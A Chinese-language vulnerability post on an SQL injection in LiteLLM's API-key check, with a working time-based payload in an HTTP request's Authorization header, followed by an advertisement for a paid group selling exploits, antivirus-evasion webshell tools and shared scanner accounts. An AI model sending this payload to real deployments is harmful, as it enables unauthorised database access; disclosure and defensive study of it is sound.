在 LiteLLM 1.81.16 到 1.83.7 版本中，漏洞的根本原因是在执行 SQL 查询时直接使用了 HTTP 请求头中的 Authorization: Bearer 的值，而没有对该值进行参数化处理或验证。这意味着，如果攻击者能够访问 LiteLLM 代理，他们便可以通过伪造请求头，绕过认证机制，向 PostgreSQL 后端数据库注入恶意的 SQL 查询语句。

攻击者只需向任意 LLM API 路由发送特定构造的 Authorization: Bearer 值，无需有效凭证，即可触发漏洞查询路径，影响数据库执行任意 SQL 操作。 

典型受影响的 API 路径包括：

• POST /v1/chat/completions

• POST /v1/embeddings

• 其他需要检验 API key 的 endpoint

Request Packet

GET /v1/models HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Authorization: Bearer test' OR (SELECT 1 FROM (SELECT pg_sleep(15)) t) IS NOT NULL--Connection: keep-aliveContent-Type: application/jsonUpgrade-Insecure-Requests: 1Connection: keep-alive

‍‍‍

目前Vercel、Cloudflare等主流云服务平台已同步后台部署专属漏洞防护规则，未完成修复升级的业务可优先将LiteLLM网关业务迁移至已防护节点，或直接开启平台自带的AI应用安全防护、SQL注入专项防护模块，临时拦截恶意注入请求，阻断漏洞利用攻击链路，快速降低被攻击风险。

内部星球VIP介绍V1.5（更多未公开挖洞技术欢迎加入星球）

如果你想学习更多另类渗透SRC挖洞技术/攻防/免杀/应急溯源/赏金赚取/工作内推，欢迎加入我们内部星球可获得内部工具字典和享受内部资源/内部群🔥

🚀1.每周更新1day/0day漏洞刷分上分，目前已更新至5394+;

🧰2.包含网上的各种付费工具/各种Burp漏洞检测插件/fuzz字典等等;

🧩3.Fofa/Hunter/Ctfshow/360Quake/Shadon/零零信安/Zoomeye各种账号高级VIP会员共享等等;

🎥4.最新SRC挖洞文库/红队/代审/免杀/逆向视频资源等等;

🧪5.内部自动化漏扫赚赏金捡洞工具，免杀CS/Webshell工具等等;

💡6.漏洞报告文库、共享SRC漏洞报告学习挖洞技巧；

🎯6.最新0Day1Day漏洞POC/EXP分享地址（同步更新）;

https://t.zsxq.com/8IDY4(全网最新最完整的漏洞库)

🔥7.详情直接点击下方链接进入了解，后台回复” 星球 “获取优惠先到先得！后续资源会更丰富在加入还是低价！（即将涨价）以上仅介绍部分内容还没完！点击下方地址全面了解👇🏻